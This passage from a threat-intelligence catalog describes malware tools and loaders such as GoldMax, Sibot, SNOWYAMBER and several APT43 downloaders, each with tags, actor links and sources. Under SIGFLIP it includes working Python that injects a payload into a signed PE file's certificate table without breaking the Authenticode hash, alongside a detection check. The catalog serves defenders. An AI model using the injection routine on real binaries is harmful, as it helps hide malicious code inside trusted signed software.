https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

Caterpillar WebShell

The tag is: misp-galaxy:tool="Caterpillar WebShell"

Table 16742. Table References

Links

https://www.clearskysec.com/cedar/

P.A.S. webshell

The P.A.S. webshell was developed by a Ukrainian student, Jaroslav Volodimirovich Panchenko, who used the nickname Profexer. It was developed in PHP and features a characteristic password-based encryption. This tool was available through a form on his website, where a user had to provide a password to receive a custom webshell. The form suggested a donation to the developer. It was commonly used, including during a WordPress website attack.

The tag is: misp-galaxy:tool="P.A.S. webshell"

P.A.S. webshell is also known as:

  • Fobushell

Table 16743. Table References

Links

https://us-cert.cisa.gov/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

Exaramel

Exaramel is a backdoor first publicly reported by ESET in 2018. Two samples were identified, one targeting the Windows operating system and the other targeting Linux operating systems.

The tag is: misp-galaxy:tool="Exaramel"

Table 16744. Table References

Links

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

RDAT

RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.

The tag is: misp-galaxy:tool="RDAT"

RDAT has relationships with:

  • similar: misp-galaxy:malpedia="RDAT" with estimative-language:likelihood-probability="almost-certain"

Table 16745. Table References

Links

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

TEARDROP

Loader used in hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders.

The tag is: misp-galaxy:tool="TEARDROP"

TEARDROP has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="Raindrop" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="TEARDROP" with estimative-language:likelihood-probability="almost-certain"

Table 16746. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

GoldMax

Written in Go, GoldMax acts as a command-and-control backdoor for the actor. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running. GoldMax establishes a secure session key with its C2 and uses that key to securely communicate with the C2, preventing non-GoldMax-initiated connections from receiving and identifying malicious traffic. The C2 can send commands to be launched for various operations, including native OS commands, via pseudo-randomly generated cookies. The hardcoded cookies are unique to each implant, appearing to be random strings but mapping to victims and operations on the actor side.

The tag is: misp-galaxy:tool="GoldMax"

GoldMax has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="GoldMax" with estimative-language:likelihood-probability="almost-certain"

Table 16747. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Raindrop

Loader used in hands-on-keyboard techniques that attackers employed on compromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders.

The tag is: misp-galaxy:tool="Raindrop"

Raindrop has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • variant-of: misp-galaxy:tool="TEARDROP" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Raindrop" with estimative-language:likelihood-probability="almost-certain"

Table 16748. Table References

Links

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

GoldFinder

A tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g., hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g., loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file:

The tag is: misp-galaxy:tool="GoldFinder"

GoldFinder has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 16749. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Sibot

Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript file is given a name that impersonates legitimate Windows tasks and is either stored in the registry of the compromised system or in an obfuscated format on disk. The VBScript is then run via a scheduled task.

The tag is: misp-galaxy:tool="Sibot"

Sibot has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

Table 16750. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Matanbuchus

Matanbuchus is a loader promoted by BelialDemon. It can launch an EXE or DLL file in memory, leverage schtasks.exe to add or modify task schedules, and launch custom PowerShell commands, among other capabilities. Attackers use a Microsoft Excel document as the initial vector to drop the Matanbuchus Loader DLL.

The tag is: misp-galaxy:tool="Matanbuchus"

Matanbuchus has relationships with:

  • similar: misp-galaxy:malpedia="Matanbuchus" with estimative-language:likelihood-probability="almost-certain"

Table 16751. Table References

Links

https://unit42.paloaltonetworks.com/matanbuchus-malware-as-a-service/

BLUELIGHT

It is likely that BLUELIGHT is used as a secondary payload following successful delivery of Cobalt Strike.

The tag is: misp-galaxy:tool="BLUELIGHT"

Table 16752. Table References

Links

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

ESPecter bootkit

ESET researchers have analyzed a previously undocumented, real-world UEFI bootkit that persists on the EFI System Partition (ESP). The bootkit, which we’ve named ESPecter, can bypass Windows Driver Signature Enforcement to load its own unsigned driver, which facilitates its espionage activities. Alongside Kaspersky’s recent discovery of the unrelated FinSpy bootkit, it is now safe to say that real-world UEFI threats are no longer limited to SPI flash implants, as used by Lojax.

The tag is: misp-galaxy:tool="ESPecter bootkit"

Table 16753. Table References

Links

https://www.welivesecurity.com/2021/10/05/uefi-threats-moving-esp-introducing-especter-bootkit/

https://github.com/eset/malware-ioc/tree/master/especter

Shark

Shark is a 32-bit executable written in C# and .NET. To run Shark, a parameter is passed on the command line that includes the executable’s filename. Shark generates a mutex that uses the executable’s filename as the mutex value. The mutex likely ensures Shark does not execute on a machine where it is already running and that the correct version of Shark is executed.

The tag is: misp-galaxy:tool="Shark"

Shark has relationships with:

  • similar: misp-galaxy:malpedia="Shark" with estimative-language:likelihood-probability="almost-certain"

Table 16754. Table References

Links

https://www.prevailion.com/latest-targets-of-cyber-group-lyceum/

Motnug

Motnug is a simple shellcode loader that is used to load and execute shellcode located either in its overlay or in a separate file stored on disk.

The tag is: misp-galaxy:tool="Motnug"

Table 16755. Table References

Links

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/

BadPotato

BadPotato leaks a system token handle through the MS RPN API, which can be used to get NT AUTHORITY\SYSTEM access.

The tag is: misp-galaxy:tool="BadPotato"

Table 16756. Table References

Links

https://github.com/BeichenDream/BadPotato

https://www.mandiant.com/resources/apt41-us-state-governments

https://thehackernews.com/2021/06/chinese-hackers-believed-to-be-behind.html

https://blog.group-ib.com/colunmtk_apt41

Microcin

A simple RAT used by Vicious Panda.

The tag is: misp-galaxy:tool="Microcin"

Microcin is also known as:

  • Mikroceen

Microcin has relationships with:

  • similar: misp-galaxy:malpedia="Microcin" with estimative-language:likelihood-probability="almost-certain"

Table 16757. Table References

Links

https://securelist.com/microcin-is-here/97353

https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636

https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia

https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia

https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign

Esile

The Esile campaign was named after certain strings found in the unpacked malware file that it sends out. All of the malware related to this campaign are detected as BKDR_ESILE variants.

The tag is: misp-galaxy:tool="Esile"

Esile is also known as:

  • BKDR_ESILE

Esile has relationships with:

  • used-by: misp-galaxy:threat-actor="LOTUS PANDA" with estimative-language:likelihood-probability="likely"

Table 16758. Table References

Links

https://www.trendmicro.com/vinfo/de/security/news/cyber-attacks/esile-targeted-attack-campaign-hits-apac-governments

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/esile

MOUSEISLAND

MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email (Figure 2). Based on our intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID. Mandiant attributes the MOUSEISLAND distribution of PHOTOLOADER and other payloads to UNC2420, a distribution threat cluster created by Mandiant’s Threat Pursuit team. UNC2420 activity shares overlaps with the publicly reported nomenclature of “Shathak” or “TA551”.

The tag is: misp-galaxy:tool="MOUSEISLAND"

MOUSEISLAND has relationships with:

  • similar: misp-galaxy:malpedia="MOUSEISLAND" with estimative-language:likelihood-probability="almost-certain"

Table 16759. Table References

Links

https://www.mandiant.com/resources/blog/melting-unc2198-icedid-to-ransomware-operations

GootLoader

GootLoader is a malware loader historically associated with the GootKit malware. As its developers updated its capabilities, GootLoader has evolved from a loader that downloads a single malicious payload into a multi-payload malware platform. As loader malware, GootLoader is usually the first stage of a system compromise. Through search engine poisoning, GootLoader's operators compromise or create websites that rank highly in search engine results, such as Google search results, and deliver the loader as malicious files offered for download from those pages.

The tag is: misp-galaxy:tool="GootLoader"

GootLoader has relationships with:

  • similar: misp-galaxy:malpedia="GootLoader" with estimative-language:likelihood-probability="almost-certain"

Table 16760. Table References

Links

https://www.cyber.nj.gov/alerts-advisories/gootloader-malware-platform-uses-sophisticated-techniques-to-deliver-malware

https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader

BumbleBee

BumbleBee is a modular backdoor that comprises two applications, a server and a client (a "master" and a "slaver" application, respectively, in the malware's own jargon). Once the client application is deployed on the target computer (commonly local government devices), threat actors can control the machine using the server module.

The tag is: misp-galaxy:tool="BumbleBee"

BumbleBee has relationships with:

  • related-to: misp-galaxy:exploit-kit="Hunter" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="BumbleBee" with estimative-language:likelihood-probability="almost-certain"

Table 16761. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/buzzing-in-the-background-bumblebee-a-new-modular-backdoor-evolv.html

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Chisel

Chisel is a fast TCP/UDP tunnel, transported over HTTP and secured via SSH, shipped as a single executable that contains both client and server. It is written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into a network. Benign in itself, but used by threat actors.

The tag is: misp-galaxy:tool="Chisel"

Table 16762. Table References

Links

https://github.com/jpillora/chisel

SharPyShell

SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications

The tag is: misp-galaxy:tool="SharPyShell"

Table 16763. Table References

Links

https://github.com/antonioCoco/SharPyShell

Raspberry Robin

Raspberry Robin has evolved from being a widely distributed worm with no observed post-infection actions when Red Canary first reported it in May 2022, to one of the largest malware distribution platforms currently active.

The tag is: misp-galaxy:tool="Raspberry Robin"

Raspberry Robin has relationships with:

  • similar: misp-galaxy:malpedia="Raspberry Robin" with estimative-language:likelihood-probability="almost-certain"

Table 16764. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Fauppod

The Fauppod malware delivers a JavaScript backdoor to gain unauthorized access to the target system and deploy additional malware.

The tag is: misp-galaxy:tool="Fauppod"

Table 16765. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

Truebot

Truebot takes multiple screenshots of the desktop and saves them in a .dat file that becomes a collection of bitmap images. According to Group-IB, FlawedAmmyy.downloader and Truebot are believed to have been developed by the same individual.

The tag is: misp-galaxy:tool="Truebot"

Truebot is also known as:

  • Silence

Truebot has relationships with:

  • similar: misp-galaxy:tool="Truebot" with estimative-language:likelihood-probability="likely"

Table 16766. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

FakeUpdates

FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT. FAKEUPDATES has been heavily used by UNC1543, a financially motivated group.

SocGholish, first appearing in late 2017 and rising to prominence in mid-2018, has been used to describe both the web drive-by download network used to infect victims and the JavaScript-based loader malware that targets Windows systems.

The tag is: misp-galaxy:tool="FakeUpdates"

FakeUpdates is also known as:

  • FakeUpdate

  • SocGholish

FakeUpdates has relationships with:

  • used-by: misp-galaxy:threat-actor="GOLD PRELUDE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="FAKEUPDATES" with estimative-language:likelihood-probability="almost-certain"

Table 16767. Table References

Links

https://www.malwarebytes.com/blog/news/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://www.secureworks.com/research/threat-profiles/gold-prelude

https://redcanary.com/threat-detection-report/threats/socgholish/

TgToxic

TgToxic is an Android banking trojan (detected by Trend Micro as AndroidOS_TgToxic, a name derived from its distinctive encrypted file name) embedded in multiple fake apps.

The tag is: misp-galaxy:tool="TgToxic"

Table 16768. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/tgtoxic-malware-targets-southeast-asia-android-users.html

WasabiSeed

According to Proofpoint, WasabiSeed is a simple VBS downloader that repeatedly uses Windows Installer to contact the C2 server looking for MSI packages to download and run. Proofpoint observed it first downloading and executing a second MSI file containing Screenshotter.

The tag is: misp-galaxy:tool="WasabiSeed"

WasabiSeed has relationships with:

  • similar: misp-galaxy:tool="SunSeed" with estimative-language:likelihood-probability="likely"

Table 16769. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

Screenshotter

According to Proofpoint, this is a utility with a single function of taking a JPG screenshot of the user’s desktop and submitting it to a remote C2 via a POST to a hardcoded IP address. This is helpful to the threat actor during the reconnaissance and victim profiling stage.

The tag is: misp-galaxy:tool="Screenshotter"

Table 16770. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

SunSeed

According to Proofpoint, SunSeed is Lua-based malware, likely operated by a nation-state sponsored attacker, used to target European government personnel involved in managing the logistics of refugees fleeing Ukraine.

The tag is: misp-galaxy:tool="SunSeed"

SunSeed has relationships with:

  • similar: misp-galaxy:malpedia="SunSeed" with estimative-language:likelihood-probability="almost-certain"

Table 16771. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails

https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware

AHK Bot

According to Proofpoint, the A(uto)H(ot)K(ey) Bot is a collection of separate AutoHotKey scripts. The bot's main component is an infinite loop that polls for and downloads additional AHK scripts. The bot can load a stealer such as Rhadamanthys and can check whether the machine is part of an Active Directory domain.

The tag is: misp-galaxy:tool="AHK Bot"

Table 16772. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me

https://research.checkpoint.com/2019/finteam-trojanized-teamviewer-against-government-targets/

https://www.trendmicro.com/en_us/research/19/d/potential-targeted-attack-uses-autohotkey-and-malicious-script-embedded-in-excel-file-to-avoid-detection.html

https://www.trendmicro.com/en_us/research/20/l/stealth-credential-stealer-targets-us-canadian-bank-customers.html

SNOWYAMBER

A tool first used in October 2022, abusing the Notion service to communicate and download further malicious files. Two versions of this tool have been observed.

SNOWYAMBER is a dropper used in an espionage campaign that significantly overlaps with publicly described activity linked to the APT29 and NOBELIUM activity sets. SNOWYAMBER abuses the Notion collaboration service as a communication channel. It has no capabilities beyond downloading and executing a second stage. To bypass security products, SNOWYAMBER uses several anti-detection and obfuscation techniques, including string encryption, dynamic API resolving, EDR/AV unhooking, and direct syscalls.

The tag is: misp-galaxy:tool="SNOWYAMBER"

SNOWYAMBER has relationships with:

  • used-by: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:online-service="Notion" with estimative-language:likelihood-probability="likely"

Table 16773. Table References

Links

https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

https://www.gov.pl/attachment/6e085a2c-ac05-4b62-9423-5d6e9ef730bf

https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d

HALFRIG

Used for the first time in February 2023. This tool is distinguished from the others by the embedded code that runs the COBALT STRIKE tool.

HALFRIG is a stager for the Cobalt Strike Beacon that was used in an espionage campaign significantly overlapping with publicly described activity linked to the APT29 and NOBELIUM activity sets. HALFRIG has significant code overlap with QUARTERRIG, and it is highly probable that both were developed by the same team.

The tag is: misp-galaxy:tool="HALFRIG"

HALFRIG has relationships with:

  • used-by: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

Table 16774. Table References

Links

https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

https://www.gov.pl/attachment/64193e8d-05e2-4cbf-bb4c-5f58da21fefb

https://www.gov.pl/attachment/6e085a2c-ac05-4b62-9423-5d6e9ef730bf

QUARTERRIG

A tool first used in March 2023, sharing part of the code with HALFRIG. Two versions of this tool were observed.

QUARTERRIG is a dropper used in an espionage campaign that significantly overlaps with publicly described activity linked to the APT29 and NOBELIUM activity sets. QUARTERRIG has no capabilities beyond downloading and executing a second stage. To bypass security products, QUARTERRIG relies heavily on obfuscation based on opaque predicates and on multi-stage execution that interweaves shellcode and PE files. HALFRIG and QUARTERRIG share part of their codebase, suggesting that the QUARTERRIG authors have access to both the HALFRIG source code and the same obfuscation libraries.

The tag is: misp-galaxy:tool="QUARTERRIG"

QUARTERRIG has relationships with:

  • used-by: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

Table 16775. Table References

Links

https://www.gov.pl/web/baza-wiedzy/espionage-campaign-linked-to-russian-intelligence-services

https://www.gov.pl/attachment/6f51bb1a-3ad2-461c-a16d-408915a56f77

https://www.gov.pl/attachment/6e085a2c-ac05-4b62-9423-5d6e9ef730bf

ICONICSTEALER

ICONICSTEALER is a C/C++ data miner that collects application configuration data as well as browser history.

The tag is: misp-galaxy:tool="ICONICSTEALER"

Table 16776. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

DAVESHELL

DAVESHELL is shellcode that functions as an in-memory dropper. Its embedded payload is mapped into memory and executed.

The tag is: misp-galaxy:tool="DAVESHELL"

Table 16777. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

SIGFLIP

SigFlip is a tool for patching Authenticode-signed PE/COFF files to inject arbitrary code without affecting or breaking the file's signature.

The tag is: misp-galaxy:tool="SIGFLIP"

Table 16778. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise
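Why a SigFlip-style patch survives signature validation, and the check a defender can run against it. This is an added example written for this page, not code from the SigFlip project or from Mandiant's report: the minimal PE32+ it builds is constructed, its "signature" is a toy DER SEQUENCE standing in for a real PKCS#7 SignedData, and the hashing assumes headers and sections are laid out contiguously in the file (real Authenticode hashes sections in PointerToRawData order). The Authenticode hash skips exactly three regions, the CheckSum field, the security data-directory entry and the certificate table itself, so bytes appended inside the certificate table change the file without changing the hash the signature covers:

```python
import hashlib
import struct

OPT_CHECKSUM = 64        # CheckSum offset inside the optional header (PE32 and PE32+)
SECURITY_DIR_INDEX = 4   # IMAGE_DIRECTORY_ENTRY_SECURITY


def pe_layout(pe: bytes):
    """Locate the three regions Authenticode leaves out of the hash:
    (checksum_off, security_dir_off, cert_table_off, cert_table_size)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                               # after "PE\0\0" + COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd_base = opt + (112 if magic == 0x20B else 96)       # data directories, PE32+ vs PE32
    secdir = dd_base + 8 * SECURITY_DIR_INDEX
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir)   # a file offset, not an RVA
    return opt + OPT_CHECKSUM, secdir, cert_off, cert_size


def authenticode_hash(pe: bytes, algo: str = "sha256") -> str:
    """Hash the image the way Authenticode does: everything except CheckSum,
    the security directory entry and the certificate table. Simplified to a
    sequential walk, which is equivalent when the file has no gaps."""
    checksum_off, secdir, cert_off, cert_size = pe_layout(pe)
    h = hashlib.new(algo)
    h.update(pe[:checksum_off])
    h.update(pe[checksum_off + 4:secdir])
    if cert_size:
        h.update(pe[secdir + 8:cert_off])
        h.update(pe[cert_off + cert_size:])
    else:
        h.update(pe[secdir + 8:])
    return h.hexdigest()


def sigflip_style_inject(pe: bytes, payload: bytes) -> bytes:
    """Append payload inside the certificate table, the one region the signature
    does not cover, then grow WIN_CERTIFICATE.dwLength and the security directory
    size so the table still accounts for every byte of the file."""
    _, secdir, cert_off, cert_size = pe_layout(pe)
    if not cert_size or cert_off + cert_size != len(pe):
        raise ValueError("expected the certificate table at the end of the file")
    padded = payload + b"\0" * (-len(payload) % 8)        # entries are 8-byte aligned
    out = bytearray(pe + padded)
    struct.pack_into("<I", out, cert_off, cert_size + len(padded))
    struct.pack_into("<II", out, secdir, cert_off, cert_size + len(padded))
    return bytes(out)


def der_total_length(blob: bytes) -> int:
    """Size of the outermost DER element (tag + length bytes + content)."""
    if blob[0] != 0x30:
        raise ValueError("bCertificate should start with a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def cert_table_slack(pe: bytes) -> int:
    """Defender check: bytes in the first WIN_CERTIFICATE entry beyond the DER blob
    it carries. A genuine signature leaves at most 7 bytes of alignment padding;
    more means data was appended after signing. Dual-signed files hold several
    entries; only the first is inspected here."""
    _, _, cert_off, cert_size = pe_layout(pe)
    if not cert_size:
        return 0
    dw_length = struct.unpack_from("<I", pe, cert_off)[0]
    return dw_length - 8 - der_total_length(pe[cert_off + 8:cert_off + dw_length])


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+ (one section, one certificate entry). The blob in
    the certificate table is a toy DER SEQUENCE, not a real PKCS#7 signature."""
    toy_pkcs7 = b"\x30\x06\x02\x04\xde\xad\xbe\xef"       # SEQUENCE { INTEGER }
    win_cert = struct.pack("<IHH", 8 + len(toy_pkcs7), 0x0200, 0x0002) + toy_pkcs7
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                  # PE32+ magic
    struct.pack_into("<I", opt, 60, 512)                   # SizeOfHeaders
    struct.pack_into("<I", opt, 108, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * SECURITY_DIR_INDEX, 1024, len(win_cert))
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 512, 0x1000, 512, 512, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    headers += b"\0" * (512 - len(headers))
    return headers + b"\xC3" * 512 + win_cert              # section body is a RET sled


if __name__ == "__main__":
    clean = build_sample_pe()
    patched = sigflip_style_inject(clean, b"\x90" * 5)
    print("authenticode hash unchanged:", authenticode_hash(clean) == authenticode_hash(patched))
    print("slack clean/patched:", cert_table_slack(clean), cert_table_slack(patched))
```

On a file whose signature still validates, slack above the 7-byte alignment allowance is the signal to look for; signature verification alone will not flag it, because the verifier never hashes that region.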

COLDCAT

COLDCAT is a complex downloader. COLDCAT generates unique host identifier information, and beacons it to a C2 that is specified in a separate file via POST request with the data in the cookie header. After a brief handshake, the malware expects base64 encoded shellcode to execute in response.

The tag is: misp-galaxy:tool="COLDCAT"

Table 16779. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

TAXHAUL

TAXHAUL is a DLL that, when executed, decrypts a shellcode payload expected at C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TXR.0.regtrans-ms. Mandiant has seen TAXHAUL persist via DLL side loading.

The tag is: misp-galaxy:tool="TAXHAUL"

Table 16780. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

SUDDENICON

Downloader (classification uncertain).

The tag is: misp-galaxy:tool="SUDDENICON"

Table 16781. Table References

Links

https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise

AMADEY

AMADEY is a downloader written in C that retrieves payloads via HTTP. Downloaded payloads are written to disk and executed. Availability: Public

The tag is: misp-galaxy:tool="AMADEY"

AMADEY has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16782. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

BENCHMARK

BENCHMARK is a dropper written in C/C++ that reads a filename and extracts a Base64 encoded payload from a hard-coded path, decodes the payload and drops it to disk. Availability: Non-public

The tag is: misp-galaxy:tool="BENCHMARK"

BENCHMARK has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16783. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

BITTERSWEET

BITTERSWEET is a C/C++ Windows downloader. It collects basic system information before downloading the next stage to disk and executing. Availability: Non-public

The tag is: misp-galaxy:tool="BITTERSWEET"

BITTERSWEET has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16784. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

BRAVEPRINCE

BRAVEPRINCE is a C/C++ downloader. It uses the Daum email service to upload collected system information and download files. Availability: Public

The tag is: misp-galaxy:tool="BRAVEPRINCE"

BRAVEPRINCE has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16785. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

COINTOSS

COINTOSS is a C/C++ downloader. It uses the Windows Management Instrumentation command-line (WMIC) utility to download the payload over FTP. COINTOSS then creates and runs a batch script to uninstall itself. Availability: Non-public

The tag is: misp-galaxy:tool="COINTOSS"

COINTOSS is also known as:

  • COINTOSS.XLM

COINTOSS has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16786. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

DINOLAB

DINOLAB is a C/C++ builder. It is used to encrypt and decrypt files, obfuscate VBS scripts, and infect files. Availability: Non-public

The tag is: misp-galaxy:tool="DINOLAB"

DINOLAB has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16787. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

DRIVEDOWN

DRIVEDOWN is a C/C++ Windows downloader capable of executing embedded scripts and downloading stages from OneDrive. Availability: Non-public

The tag is: misp-galaxy:tool="DRIVEDOWN"

DRIVEDOWN has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

Table 16788. Table References

Links

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

GOLDDRAGON

GOLDDRAGON is a downloader written in C that retrieves a payload from a remote server via HTTP. The downloaded payload is written to disk and executed. GOLDDRAGON also extracts a payload from a Hangul Word Processor document and writes it to a startup directory. As a result, the new file is executed when the current user logs in. Availability: Non-public

The tag is: misp-galaxy:tool="GOLDDRAGON"

GOLDDRAGON is also known as:

  • GOLDDRAGON.POWERSHELL

GOLDDRAGON has relationships with:

  • used-by: misp-galaxy:threat-actor="APT43" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="GoldDragon" with estimative-language:likelihood-probability="likely"

Table 16789. Table References

Links

